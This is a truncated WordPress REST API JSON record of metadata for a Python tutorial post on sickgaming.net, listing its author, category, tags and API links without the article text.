[&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":0,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[857],"tags":[73,468,528],"class_list":["post-131088","post","type-post","status-publish","format-standard","hentry","category-python-tut","tag-programming","tag-python","tag-tutorial"],"_links":{"self":[{"href":"https:\/\/sickgaming.net\/blog\/wp-json\/wp\/v2\/posts\/131088","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/sickgaming.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/sickgaming.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/sickgaming.net\/blog\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/sickgaming.net\/blog\/wp-json\/wp\/v2\/comments?post=131088"}],"version-history":[{"count":0,"href":"https:\/\/sickgaming.net\/blog\/wp-json\/wp\/v2\/posts\/131088\/revisions"}],"wp:attach
ment":[{"href":"https:\/\/sickgaming.net\/blog\/wp-json\/wp\/v2\/media?parent=131088"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/sickgaming.net\/blog\/wp-json\/wp\/v2\/categories?post=131088"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/sickgaming.net\/blog\/wp-json\/wp\/v2\/tags?post=131088"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}